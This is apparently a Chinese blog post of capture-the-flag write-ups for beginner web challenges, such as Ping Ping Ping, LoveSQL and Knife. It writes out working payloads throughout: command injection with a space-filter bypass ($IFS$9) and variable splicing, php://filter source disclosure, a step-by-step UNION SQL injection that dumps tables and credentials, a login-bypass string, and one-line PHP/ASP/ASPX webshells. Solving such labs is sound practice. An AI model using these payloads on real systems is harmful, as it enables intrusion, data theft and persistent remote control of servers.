无法查看源代码
这个我f12看不了,用Ctrl+u
robots
提示robots.txt,就在网站后边加上/robots.txt看看有没有,然后在查看flagishere.txt
phps文件泄露
在网站后面加/index.phps就可以下载网站的php源代码文件,打开即可。
解压源代码到当前目录
加/WWW.zip 或者/www.zip
[ACTF2020 新生赛]Include
输入127.0.0.1|ls / 看根目录
输入127.0.0.1|cat /flag看flag
[极客大挑战 2019]Secret File
感谢大佬博客
点进网站,看源代码
那就在网站后面加个/Archive_room.php
查看源代码
在网站后面加/action.php(把上一步的删掉)
可以看到网站闪的很快,这时候我们就要用BurpSuite抓
返回有secret的页面,Foxy改下
然后这里改好
点secret,网页转圈,BurpSuite有东西出现了
当action.php出现的时候
右键发送到repeater
然后点repeater再点send
可以看到response这里出现了个 secr3t.php
返回网址,在后面加/ secr3t.php
然后是php伪协议,在网址后面加?file=php://filter/read=convert.base64-encode/resource=flag.php
解一下码就是flag了
[GXYCTF 2019]Ping Ping Ping
先在网址后边加上/?ip=127.0.0.1
成功了,可以用;执行语句了,先用ls查看列表
尝试直接cat flag.php
那就说明需要绕过什么东西去cat它
可以使用$IFS$9
绕过空格
?ip=127.0.0.1;cat$IFS$9index.php
成功了,然后还得绕过,可以用变量拼接的方法来绕过flag这个关键字。
让变量a=ag,让变量b=fl?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php
查看源代码就可以看到flag了
码个讲了挺多绕过方法的大佬博客
[极客大挑战 2019]LoveSQL
万能密码登录用户名:1' or 1=1# 密码:123(随便输)
查看源代码发现正确的用户名和密码
那个密码尝试md5碰撞,失败
查询字段数check.php?username=admin' order by 4%23&password=1
试到4的时候报错了
可知共3个字段。用union查询测试注入点(回显点位)check.php?username=1' union select 1,2,3%23&password=1
得到回显点位为2和3,查询当前数据库名及版本check.php?username=1' union select 1,database(),version()%23&password=1
可知当前数据库为geek,接下来,爆表/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
爆出这两个表,我们试一下l0ve1ysq1这个表,爆字段/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
爆数据/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
得到flag
来自小白的感悟:这一套连招好丝滑但是真的能靠脑子记下来吗=-=
[极客大挑战 2019]Knife
做这道题之前要了解一下webshell和木马
三种一句话木马
php<?php @eval($_POST['x'];?)>
asp<%eval request ("x")%>
aspx<%@ Page Language="Jscript"%> <%eval(Request.Item["x"],"unsafe");%>
然后用中国菜刀或者蚁剑就能弄出来了
原创文章,作者:jamestackk,如若转载,请注明出处:https://blog.ytso.com/tech/php/273245.html